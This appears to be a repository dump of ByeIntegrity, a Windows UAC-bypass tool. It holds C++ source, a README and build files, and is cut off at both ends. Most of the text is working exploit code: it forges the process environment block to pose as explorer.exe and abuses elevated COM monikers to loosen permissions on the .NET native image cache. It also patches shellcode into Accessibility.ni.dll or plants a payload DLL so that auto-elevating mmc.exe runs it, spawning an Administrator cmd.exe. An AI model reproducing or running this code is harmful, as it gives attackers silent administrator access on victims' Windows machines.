};\n\tCoTaskMemFree(winPath);\n\texplorer += L\"\\\\explorer.exe\";\n\n\thr = LdrEnumerateLoadedModules(0, [](PLDR_DATA_TABLE_ENTRY2 entry, PVOID context, PBOOLEAN stop)\n\t\t{\n\t\t\tif (entry->DllBase == &__ImageBase)\n\t\t\t{\n\t\t\t\tentry->BaseDllName.Buffer = const_cast(L\"explorer.exe\");\n\t\t\t\tentry->BaseDllName.Length = sizeof(L\"explorer.exe\");\n\t\t\t\tentry->BaseDllName.MaximumLength = sizeof(L\"explorer.exe\");\n\n\t\t\t\tentry->FullDllName.Buffer = const_cast(reinterpret_cast(context)->c_str());\n\t\t\t\tentry->FullDllName.Length = static_cast((reinterpret_cast(context)->length() + 1) * sizeof WCHAR);\n\t\t\t\tentry->FullDllName.MaximumLength = static_cast(reinterpret_cast(context)->capacity());\n\n\t\t\t\t*stop = TRUE;\n\t\t\t}\n\t\t}, &explorer);\n\tif (FAILED(hr))\n\t{\n\t\tstd::wcout << L\"LdrEnumerateLoadedModules() failed. NTSTATUS: 0x\" << std::hex << hr << std::endl;\n\t\treturn 1;\n\t}\n\n\tComPtr securityEditor;\n\tBIND_OPTS3 opts{};\n\topts.cbStruct = sizeof BIND_OPTS3;\n\topts.dwClassContext = CLSCTX_LOCAL_SERVER;\n\n\thr = CoGetObject(L\"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}\", &opts, IID_ISecurityEditor, &securityEditor);\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"CoGetObject\", hr);\n\t\treturn 1;\n\t}\n\n\tasmPath += L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\";\n\tstd::wstring workPath{ asmPath };\n\tLPCOLESTR oldSecurityPtr;\n\thr = securityEditor->GetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, &oldSecurityPtr);\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"ISecurityEditor::GetSecurity\", hr);\n\t\treturn 1;\n\t}\n\tstd::wstring oldSecurity{ oldSecurityPtr };\n\tCoTaskMemFree(reinterpret_cast(const_cast(oldSecurityPtr)));\n\n\thr = securityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, L\"D:PAI(A;OICI;FA;;;WD)\");\n\tif (FAILED(hr))\n\t{\n\t\tCOUT_FAILED_HR(L\"ISecurityEditor::SetSecurity\", hr);\n\t\treturn 1;\n\t}\n\n\tworkPath += L\"\\\\MMCEx\";\n\tstd::wstring oldPathName{ workPath + L\".old\" }, originalPath{ workPath };\n\tauto restore{ true };\n\tif (!MoveFileW(workPath.c_str(), oldPathName.c_str()))\n\t{\n\t\tif (GetLastError() != ERROR_FILE_NOT_FOUND)\n\t\t{\n\t\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\t\tCOUT_FAILED_WIN32(L\"MoveFileW\", GetLastError());\n\t\t\treturn 1;\n\t\t}\n\t\trestore = false;\n\t}\n\n\tif (!CreateDirectoryW(workPath.c_str(), nullptr))\n\t{\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"CreateDirectoryW\", GetLastError());\n\t\treturn 1;\n\t}\n\n\tworkPath += L\"\\\\DEADBEEFDEADBEEFDEADBEEFDEADBEEF\";\n\tif (!CreateDirectoryW(workPath.c_str(), nullptr))\n\t{\n\t\tRemoveDirectoryW(originalPath.c_str());\n\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"CreateDirectoryW\", GetLastError());\n\t\treturn 1;\n\t}\n\n\tauto niPath{ workPath + L\"\\\\MMCEx.ni.dll\" }, auxPath{ workPath + L\"\\\\MMCEx.ni.dll.aux\" };\n\tif (!MoveFileW(L\"payload.dll\", niPath.c_str()))\n\t{\n\t\tRemoveDirectoryW(workPath.c_str());\n\t\tRemoveDirectoryW(originalPath.c_str());\n\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"MoveFileW\", GetLastError());\n\t\treturn 1;\n\t}\n\tif (!MoveFileW(L\"MMCEx.ni.dll.aux\", auxPath.c_str()))\n\t{\n\t\tDeleteFileW(niPath.c_str());\n\t\tRemoveDirectoryW(workPath.c_str());\n\t\tRemoveDirectoryW(originalPath.c_str());\n\n\t\tif (restore)\n\t\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\n\t\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\t\tCOUT_FAILED_WIN32(L\"MoveFileW\", GetLastError());\n\t\treturn 1;\n\t}\n\n\tauto execResult{ reinterpret_cast(ShellExecuteW(nullptr, L\"runas\", L\"mmc.exe\", L\"wf.msc\", nullptr, SW_NORMAL)) };\n\tSleep(1500);\n\tDeleteFileW(auxPath.c_str());\n\tDeleteFileW(niPath.c_str());\n\tRemoveDirectoryW(workPath.c_str());\n\tRemoveDirectoryW(originalPath.c_str());\n\tif (restore)\n\t\tMoveFileW(oldPathName.c_str(), originalPath.c_str());\n\tsecurityEditor->SetSecurity(asmPath.c_str(), SE_FILE_OBJECT, DACL_SECURITY_INFORMATION, oldSecurity.c_str());\n\tif (execResult <= 32)\n\t{\n\t\tCOUT_FAILED_WIN32(L\"ShellExecuteW\", execResult);\n\t\treturn 1;\n\t}\n\n\tSetConsoleTextAttribute(hOutput, 15);\n\tstd::wcout << L\"[+] \";\n\tSetConsoleTextAttribute(hOutput, 14);\n\tstd::wcout << L\"*** Exploit successful.\\n\\n\";\n\tSetConsoleTextAttribute(hOutput, 7);\n\n\treturn 0;\n}" }, { "path": "README.md", "content": "# ByeIntegrity — Windows UAC Bypass\nBypass User Account Control (UAC) to gain elevated (Administrator) privileges to run any program at a high integrity level.\n![](example.gif)\n\n## Requirements\n- Administrator account\n- UAC notification level set to default or lower\n\n## 2021 Update\nI have decided to update ByeIntegrity so that it's much faster, lightweight, and reliable. This is a significant overhaul so I've created a new project in the VS solution called \"ByeIntegrity2021,\" which is the updated version of this attack. Of course, the original version is still there. For more information on the new version, expand the details below.\n\n
\n\tUpdate information\n\n---\nThe new version now is able to hijack the NIC without depending on the existing native images installed into the NIC. It does this by creating its own native image descriptors and payloads, then moving them into the NIC, eliminating the need for:\n \n- Existing `*.ni` images produced by `NGEN.exe`\n- Running the system maintenance tasks\n- NIC directory traversal\n- Long wait/run time\n- Limited number of runs (before hijacked DLL runs out of space)\n \nThe CLR loads native images from the NIC by doing a recursive directory scan of each entry, and then reading its `*.aux` file. This file contains information about the native image, and its dependencies. Based off the information in the `AUX` file, the CLR will either load the image or reject it, and then move on to the next candidate. If no viable candidates are found, it loads the standard image and uses jit to compile it normally. No part of the actual native image is read (it is only checked for its existence), so ByeIntegrity simply places the payload DLL with the same name the native image would have.\n \nThe updated version of ByeIntegrity comes with a tool called **AUXGen**, which takes in the name of an assembly from the GAC and then generates its corresponding `AUX` file. The `AUX` file is generated so that it matches the CLR's checks and the CLR will load the \"native image\" which is described by the `AUX` file. Note: AUXGen does not handle dependencies when generating the `AUX` file. It only does as much as it needs to so that the CLR will load the image. I will post details of the `AUX` file format later.\n\nByeIntegrity now uses `ISecurityEditor`, just like UACMe does, which cuts down on the needed code. It also requires that you have generated the `AUX` file for the assembly `MMCEx`, and placed it in the same directory as ByeIntegrity. `MMCEx` is now the targeted image because of its load order and shorter name.\n \n
\n\n## How it works\nByeIntegrity hijacks a DLL located in the Native Image Cache (NIC). The NIC is used by the .NET Framework to store optimized .NET Assemblies that have been generated from programs like Ngen, the .NET Framework Native Image Generator. Because Ngen is usually run under the current user with Administrative privileges through the Task Scheduler, the NIC grants modify access for members of the Administrators group.\n\nThe Microsoft Management Console (MMC) Windows Firewall Snap-in uses the .NET Framework, and upon initializing it, modules from the NIC are loaded into the MMC process. The MMC executable uses AutoElevate, a mechanism Windows uses that automatically elevates a process’s token without UAC prompting.\n\nByeIntegrity hijacks a specific DLL located in the NIC named `Accessibility.ni.dll`. It writes some shellcode into an appropriately-sized area of padding located in the `.text` section of the DLL. The entry point of the DLL is then updated to point to the shellcode. Upon DLL load, the entry point (which is actually the shellcode) is executed. The shellcode calculates the address of `kernel32!CreateProcessW`, creates a new instance of `cmd.exe` running as an Administrator, and then simply returns `TRUE`. This is only for the `DLL_PROCESS_ATTACH` reason; all other reasons will immediately return `TRUE`.\n## UACMe\nThis attack is implemented in UACMe as method #63. If you want to try out this attack, please, use UACMe first. The attack is the same, however, UACMe uses a different method to modify the NIC. ByeIntegrity uses `IFileOperation` while UACMe uses `ISecurityEditor`. In addition, UACMe chooses the correct `Accessibility.ni.dll` for your system and preforms the system maintenance tasks if necessary (to generate the NIC components). ByeIntegrity simply chooses the first NIC entry that exists (which may/may not be the correct entry that MMC is using) and does not run the system maintenance tasks. ByeIntegrity contains **significantly** more code than UACMe, so reading the UACMe implementation will be much easier to understand than reading the ByeIntegrity code. Lastly, ByeIntegrity launches a child process during the attack whereas UACMe does not.\n\n**tl;dr: UACMe is simpler and more effective than ByeIntegrity, so use UACMe first.**\n## Using the code\nIf you’re reading this then you probably know how to compile the source. Just note that this hasn’t been tested or designed with x86 in mind at all, and it probably won’t work on x86 anyways.\n\nJust like UACMe, **I will never upload compiled binaries to this repo.** There are always people who want the world to crash and burn, and I'm not going to provide an easy route for them to run this on somebody else's computer and cause intentional damage. I also don't want script-kiddies to use this attack without understanding what it does and the damage it can cause.\n## Supported Versions\nThis attack works from Windows 7 (7600) up until the latest version of Windows." }, { "path": "byeintegrity/byeintegrity.vcxproj", "content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n 16.0\n {E1F82946-041D-49F3-860B-7CF7EC2C9620}\n byeintegrity\n 10.0\n \n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n Application\n true\n v143\n Unicode\n \n \n Application\n false\n v143\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n true\n \n \n false\n \n \n false\n \n \n \n Level3\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n Default\n \n \n Console\n true\n shlwapi.lib;%(AdditionalDependencies)\n \n \n \n \n Level3\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n Default\n \n \n Console\n true\n shlwapi.lib;%(AdditionalDependencies)\n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n Default\n None\n MultiThreaded\n \n \n Console\n true\n true\n false\n shlwapi.lib;%(AdditionalDependencies)\n true\n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n Default\n None\n MultiThreaded\n \n \n Console\n true\n true\n false\n shlwapi.lib;%(AdditionalDependencies)\n true\n \n \n \n \n \n \n \n \n \n \n \n" }, { "path": "byeintegrity/byeintegrity.vcxproj.filters", "content": "\n\n \n \n \n \n \n \n" }, { "path": "byeintegrity/integritybye.cpp", "content": "#include \n#include \n#include \n#include \n#include \n#include \n\n#pragma region NT Stuff\ntypedef struct _UNICODE_STRING\n{\n\tunsigned short Length;\n\tunsigned short MaximumLength;\n\tlong Padding_8;\n\twchar_t* Buffer;\n} UNICODE_STRING, * PUNICODE_STRING;\n\ntypedef struct _CURDIR\n{\n\tstruct _UNICODE_STRING DosPath;\n\tvoid* Handle;\n} CURDIR, * PCURDIR;\n\ntypedef struct _STRING\n{\n\tunsigned short Length;\n\tunsigned short MaximumLength;\n\tlong Padding_94;\n\tchar* Buffer;\n} STRING, * PSTRING;\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR\n{\n\tunsigned short Flags;\n\tunsigned short Length;\n\tunsigned long TimeStamp;\n\tstruct _STRING DosPath;\n} RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR;\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS\n{\n\tunsigned long MaximumLength;\n\tunsigned long Length;\n\tunsigned long Flags;\n\tunsigned long DebugFlags;\n\tvoid* ConsoleHandle;\n\tunsigned long ConsoleFlags;\n\tlong Padding_95;\n\tvoid* StandardInput;\n\tvoid* StandardOutput;\n\tvoid* StandardError;\n\tstruct _CURDIR CurrentDirectory;\n\tstruct _UNICODE_STRING DllPath;\n\tstruct _UNICODE_STRING ImagePathName;\n\tstruct _UNICODE_STRING CommandLine;\n\tvoid* Environment;\n\tunsigned long StartingX;\n\tunsigned long StartingY;\n\tunsigned long CountX;\n\tunsigned long CountY;\n\tunsigned long CountCharsX;\n\tunsigned long CountCharsY;\n\tunsigned long FillAttribute;\n\tunsigned long WindowFlags;\n\tunsigned long ShowWindowFlags;\n\tlong Padding_96;\n\tstruct _UNICODE_STRING WindowTitle;\n\tstruct _UNICODE_STRING DesktopInfo;\n\tstruct _UNICODE_STRING ShellInfo;\n\tstruct _UNICODE_STRING RuntimeData;\n\tstruct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];\n\tunsigned __int64 EnvironmentSize;\n\tunsigned __int64 EnvironmentVersion;\n\tvoid* PackageDependencyData;\n\tunsigned long ProcessGroupId;\n\tunsigned long LoaderThreads;\n\tstruct _UNICODE_STRING RedirectionDllName;\n\tstruct _UNICODE_STRING HeapPartitionName;\n\tunsigned __int64* DefaultThreadpoolCpuSetMasks;\n\tunsigned long DefaultThreadpoolCpuSetMaskCount;\n\tlong __PADDING__[1];\n} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;\n\nconstexpr auto PEB_OFFSET = 0x60ULL;\nconstexpr auto PROCESS_PARAM_OFFSET = 0x20ULL;\nconstexpr auto BASENAME_OFFSET = 0x58ULL;\nconstexpr auto FULLNAME_OFFSET = 0x48ULL;\nconstexpr auto DLL_BASE_OFFSET = 0x30ULL;\n#pragma endregion\n\nusing RtlInitUnicodeStringPtr = void(NTAPI*)(PUNICODE_STRING, PCWSTR);\nusing LDR_ENUM_CALLBACK = void(NTAPI*)(PVOID, PVOID, PBOOLEAN);\nusing LdrEnumerateLoadedModulesPtr = NTSTATUS(NTAPI*)(ULONG, LDR_ENUM_CALLBACK, PVOID);\n\nstruct LDR_CALLBACK_PARAMS\n{\n\tPCWCHAR ExplorerPath;\n\tPVOID ImageBase;\n\tRtlInitUnicodeStringPtr RtlInitUnicodeString;\n};\n\nconst BYTE SHELL_CODE[] = {\n\t\t\t 0x80, 0xFA, 0x01, 0x0F, 0x85, 0xA1, 0x00, 0x00, 0x00, 0x57, 0x48, 0x81, 0xEC, 0xE0, 0x00, 0x00, 0x00,\n\t\t\t 0x48, 0x8D, 0x44, 0x24, 0x70, 0x48, 0x89, 0xC7, 0x31, 0xC0, 0xB9, 0x68, 0x00, 0x00, 0x00, 0xF3, 0xAA,\n\t\t\t 0xC7, 0x44, 0x24, 0x70, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x44, 0x24, 0x50, 0x48, 0x89, 0x44, 0x24,\n\t\t\t 0x48, 0x48, 0x8D, 0x44, 0x24, 0x70, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00,\n\t\t\t 0x00, 0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,\n\t\t\t 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x31, 0xC9, 0x45, 0x31, 0xC0,\n\t\t\t 0x31, 0xD2, 0x48, 0x8D, 0x0D, 0x41, 0x00, 0x00, 0x00, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x30, 0x00, 0x00,\n\t\t\t 0x00, 0x48, 0x83, 0xC0, 0x60, 0x48, 0x8B, 0x00, 0x48, 0x83, 0xC0, 0x18, 0x48, 0x8B, 0x00, 0x48, 0x8B,\n\t\t\t 0x40, 0x10, 0x48, 0x8B, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x4D, 0x31, 0xE4, 0x41, 0xBC,\n\t\t\t 0xEF, 0xBE, 0xAD, 0xDE, 0x4C, 0x01, 0xE0, 0xFF, 0xD0, 0x48, 0x81, 0xC4, 0xE0, 0x00, 0x00, 0x00, 0x5F,\n\t\t\t 0x48, 0x31, 0xC0, 0xB0, 0x01, 0xC3\n};\n\nvoid CreateElevatedCopyObject(IFileOperation** fileOperation)\n{\n\tstd::wstring command{ L\"Elevation:Administrator!new:\" };\n\tWCHAR clsid[40];\n\tBIND_OPTS3 bind;\n\n\tif (!StringFromGUID2(CLSID_FileOperation, clsid, sizeof clsid / sizeof(WCHAR)))\n\t{\n\t\t*fileOperation = nullptr;\n\t\tstd::cout << \"Cannot create CLSID string\\n\";\n\t\treturn;\n\t}\n\n\tcommand += clsid;\n\n\tZeroMemory(&bind, sizeof(BIND_OPTS3));\n\tbind.cbStruct = sizeof(BIND_OPTS3);\n\tbind.dwClassContext = CLSCTX_LOCAL_SERVER;\n\n\tconst auto result = CoGetObject(command.c_str(), &bind, IID_IFileOperation, reinterpret_cast(fileOperation));\n\tif (FAILED(result))\n\t\tstd::cout << \"CoGetObject() failed. HRESULT: 0x\" << std::hex << result << std::endl;\n}\n\nvoid ForgeProcessInformation(const PCWCHAR explorerPath, const RtlInitUnicodeStringPtr RtlInitUnicodeString,\n\tconst LdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules)\n{\n\tconst auto pPeb = *reinterpret_cast(reinterpret_cast(NtCurrentTeb()) + PEB_OFFSET);\n\tauto pProcessParams = *reinterpret_cast(pPeb + PROCESS_PARAM_OFFSET);\n\n\tRtlInitUnicodeString(&pProcessParams->ImagePathName, explorerPath);\n\tRtlInitUnicodeString(&pProcessParams->CommandLine, L\"explorer.exe\");\n\n\tLDR_CALLBACK_PARAMS params{ explorerPath, GetModuleHandleW(nullptr), RtlInitUnicodeString };\n\n\tLdrEnumerateLoadedModules(0, [](PVOID ldrEntry, PVOID context, PBOOLEAN stop)\n\t\t{\n\t\t\tauto* params = static_cast(context);\n\n\t\t\tif (*reinterpret_cast(reinterpret_cast(ldrEntry) + DLL_BASE_OFFSET) == reinterpret_cast<\n\t\t\t\tULONG_PTR>(params->ImageBase))\n\t\t\t{\n\t\t\t\tconst auto baseName = reinterpret_cast(static_cast(ldrEntry) + BASENAME_OFFSET),\n\t\t\t\t\tfullName = reinterpret_cast(static_cast(ldrEntry) + FULLNAME_OFFSET);\n\n\t\t\t\tparams->RtlInitUnicodeString(baseName, L\"explorer.exe\");\n\t\t\t\tparams->RtlInitUnicodeString(fullName, params->ExplorerPath);\n\n\t\t\t\t*stop = TRUE;\n\t\t\t}\n\t\t}, reinterpret_cast(¶ms));\n}\n\nint ChildMain(const PWCHAR commandLine)\n{\n\tPWSTR path;\n\tif (FAILED(SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &path)))\n\t\treturn EXIT_FAILURE;\n\n\tstd::wstring explorer{ path };\n\texplorer += L\"\\\\explorer.exe\";\n\tCoTaskMemFree(path);\n\n\tSHELLSTATEW shellState;\n\tshellState.fNoConfirmRecycle = TRUE;\n\tSHGetSetSettings(&shellState, SSF_NOCONFIRMRECYCLE, TRUE);\n\n\tForgeProcessInformation(explorer.c_str(),\n\t\treinterpret_cast(\n\t\t\tGetProcAddress(GetModuleHandleW(L\"ntdll.dll\"), \"RtlInitUnicodeString\")),\n\t\treinterpret_cast(GetProcAddress(\n\t\t\tGetModuleHandleW(L\"ntdll.dll\"), \"LdrEnumerateLoadedModules\")));\n\n\tif (FAILED(CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY)))\n\t\treturn EXIT_FAILURE;\n\n\tIFileOperation* fileOperation;\n\tCreateElevatedCopyObject(&fileOperation);\n\tif (!fileOperation)\n\t{\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tIShellItem* item;\n\tif (FAILED(SHCreateItemFromParsingName(commandLine + 7, nullptr, IID_IShellItem, reinterpret_cast(&item))))\n\t{\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\tif (FAILED(fileOperation->DeleteItem(item, nullptr)))\n\t{\n\t\titem->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\tif (FAILED(fileOperation->PerformOperations()))\n\t{\n\t\titem->Release();\n\t\tfileOperation->Release();\n\t\tCoUninitialize();\n\t\treturn EXIT_FAILURE;\n\t}\n\n\titem->Release();\n\tfileOperation->Release();\n\tCoUninitialize();\n\n\treturn 0;\n}\n\nint wmain(int, wchar_t* argv[])\n{\n\tif (wcscmp(argv[0], L\"delete\") == 0)\n\t\treturn ChildMain(argv[0]);\n\tif (wcscmp(argv[0], L\"launch\") == 0)\n\t{\n\t\tif (reinterpret_cast(ShellExecuteW(nullptr, L\"open\", L\"mmc.exe\", L\"WF.msc\", nullptr, SW_HIDE)) <= 32)\n\t\t\treturn EXIT_FAILURE;\n\n\t\treturn 0;\n\t}\n\n\t/* Locals */\n\tPWSTR path, systemPath;\n\tHRESULT result;\n\tstd::wstring fullPath, cmdPath, explorer, fusionIni;\n\tWIN32_FIND_DATAW findData;\n\tHANDLE findHandle, fileHandle, mapping;\n\tPVOID pTargetFile;\n\tPIMAGE_NT_HEADERS headers;\n\tPIMAGE_SECTION_HEADER section;\n\tPBYTE zeroBlock;\n\tRtlInitUnicodeStringPtr RtlInitUnicodeString;\n\tLdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules;\n\tIFileOperation* fileOperation;\n\tLSTATUS status;\n\tDWORD openResult;\n\tHKEY userKey;\n\tIShellItem* assemblyFolder, * dummyFile;\n\tULONG_PTR requiredSize;\n\tPWCHAR currentDirectory;\n\tIShellItem* existingFile, * targetFile, * targetFolder;\n\tSTARTUPINFOW startupInfo{ sizeof STARTUPINFOW, nullptr };\n\tPROCESS_INFORMATION processInfo;\n\tstd::wstring launchCmd{ L\"delete \" };\n\tDWORD exitCode;\n\n\t/*\n\t *\tSTAGE 1\n\t *\tFind the target DLL file's path.\n\t */\n\n\tresult = SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &path);\n\tif (FAILED(result))\n\t{\n\t\tstd::cout << \"SHGetKnownFolderPath() (0) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\tresult = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath);\n\tif (FAILED(result))\n\t{\n\t\tstd::cout << \"SHGetKnownFolderPath() (1) failed. HRESULT: 0x\" << std::hex << result << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tfullPath = path;\n\tcmdPath = systemPath;\n\texplorer = path;\n\tfusionIni = path;\n\tfullPath += L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Accessibility\\\\*.*\";\n\tcmdPath += L\"\\\\cmd.exe\";\n\texplorer += L\"\\\\explorer.exe\";\n\tfusionIni += L\"\\\\assembly\\\\Desktop.ini\";\n\tCoTaskMemFree(path);\n\tCoTaskMemFree(systemPath);\n\ntryagain:\n\tfindHandle = FindFirstFileW(fullPath.c_str(), &findData);\n\tif (findHandle == INVALID_HANDLE_VALUE)\n\t{\n\t\tif (fullPath.find(L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Accessibility\\\\*.*\") != std::string::npos)\n\t\t{\n\t\t\tfullPath = fullPath.substr(0, fullPath.find(L\"\\\\assembly\\\\NativeImages_v4.0.30319_64\\\\Accessibility\\\\*.*\"));\n\t\t\tfullPath += L\"\\\\assembly\\\\NativeImages_v2.0.50727_64\\\\Accessibility\\\\*.*\";\n\t\t\tgoto tryagain;\n\t\t}\n\t\tstd::cout << \"FindFirstFileW() failed. Last error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tfor (auto i = 0; i != 2; ++i)\n\t{\n\t\tif (!FindNextFileW(findHandle, &findData))\n\t\t{\n\t\t\tif (GetLastError() == ERROR_NO_MORE_FILES)\n\t\t\t\tstd::wcout << \"No token folder exists under \" << fullPath.c_str() << std::endl;\n\t\t\telse\n\t\t\t\tstd::cout << \"FindNextFileW() failed. Error: \" << GetLastError() << std::endl;\n\n\t\t\tFindClose(findHandle);\n\t\t\treturn EXIT_FAILURE;\n\t\t}\n\t}\n\n\tfullPath.pop_back();\n\tfullPath.pop_back();\n\tfullPath.pop_back();\n\tfullPath += findData.cFileName;\n\tfullPath += L\"\\\\Accessibility.ni.dll\";\n\n\tFindClose(findHandle);\n\n\t/*\n\t *\tEND STAGE 1\n\t */\n\n\t /*\n\t *\tSTAGE 2\n\t *\tCopy the target dll, infect it and save it as \"infect.dll\".\n\t */\n\n\tif (!CopyFileW(fullPath.c_str(), L\"infect.dll\", FALSE))\n\t{\n\t\tstd::wcout << L\"Failed to copy \" << fullPath.c_str() << L\" to the current directory. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tfileHandle = CreateFileW(L\"infect.dll\", FILE_READ_ACCESS | FILE_WRITE_ACCESS, 0, nullptr, OPEN_EXISTING,\n\t\tFILE_ATTRIBUTE_NORMAL, nullptr);\n\tif (fileHandle == INVALID_HANDLE_VALUE)\n\t{\n\t\tstd::cout << \"Failed to open 'infect.dll'. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tmapping = CreateFileMappingW(fileHandle, nullptr, PAGE_READWRITE, 0, 0, nullptr);\n\tif (!mapping)\n\t{\n\t\tCloseHandle(fileHandle);\n\t\tstd::cout << \"CreateFileMapping() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tpTargetFile = MapViewOfFile(mapping, FILE_MAP_ALL_ACCESS, 0, 0, 0);\n\tif (!pTargetFile)\n\t{\n\t\tCloseHandle(mapping);\n\t\tCloseHandle(fileHandle);\n\t\tstd::cout << \"MapViewOfFile() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\theaders = reinterpret_cast(static_cast(pTargetFile) + static_cast<\n\t\tPIMAGE_DOS_HEADER>(pTargetFile)->e_lfanew);\n\n\tsection = IMAGE_FIRST_SECTION(headers);\n\twhile (std::strcmp(\".text\", reinterpret_cast(section->Name)))\n\t\t++section;\n\n\tzeroBlock = static_cast(pTargetFile) + section->PointerToRawData;\n\n\tfor (; ++zeroBlock;)\n\t{\n\t\tauto fail = false;\n\t\tfor (auto* z = zeroBlock; z != zeroBlock + sizeof SHELL_CODE + (cmdPath.size() * 2) + sizeof(L'\\0'); ++z)\n\t\t{\n\t\t\tif (*z)\n\t\t\t{\n\t\t\t\tfail = true;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (!fail)\n\t\t\tbreak;\n\t}\n\n\tmemcpy(zeroBlock, SHELL_CODE, sizeof SHELL_CODE);\n\tmemcpy(zeroBlock + sizeof SHELL_CODE, cmdPath.c_str(), (cmdPath.size() * 2) + sizeof(L'\\0'));\n\n\t*reinterpret_cast(zeroBlock + 0x99) = static_cast(reinterpret_cast(CreateProcessW) -\n\t\treinterpret_cast(GetModuleHandleW(L\"kernel32.dll\")));\n\n\tauto offset = static_cast(zeroBlock - static_cast(pTargetFile));\n\toffset -= section->PointerToRawData;\n\toffset += section->VirtualAddress;\n\theaders->OptionalHeader.AddressOfEntryPoint = offset;\n\n\tif (!FlushViewOfFile(pTargetFile, 0))\n\t{\n\t\tUnmapViewOfFile(pTargetFile);\n\t\tCloseHandle(mapping);\n\t\tCloseHandle(fileHandle);\n\t\tstd::cout << \"FlushViewOfFile() failed. Error: \" << GetLastError() << std::endl;\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tUnmapViewOfFile(pTargetFile);\n\tCloseHandle(mapping);\n\tCloseHandle(fileHandle);\n\n\t/*\n\t *\tEND STAGE 2\n\t */\n\n\t /*\n\t *\tSTAGE 3\n\t *\tForge process information to allow IFileOperation as Administrator w/o UAC prompt.\n\t */\n\n\tRtlInitUnicodeString = reinterpret_cast(GetProcAddress(\n\t\tGetModuleHandleW(L\"ntdll.dll\"), \"RtlInitUnicodeString\"));\n\tLdrEnumerateLoadedModules = reinterpret_cast(GetProcAddress(\n\t\tGetModuleHandleW(L\"ntdll.dll\"), \"LdrEnumerateLoadedModules\"));\n\n\tForgeProcessInformation(explorer.c_str(), RtlInitUnicodeString, LdrEnumerateLoadedModules);\n\n\tresult = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY);\n\tif (FAILED(result))\n\t{\n\t\tstd::cout << \"CoInitializeEx() 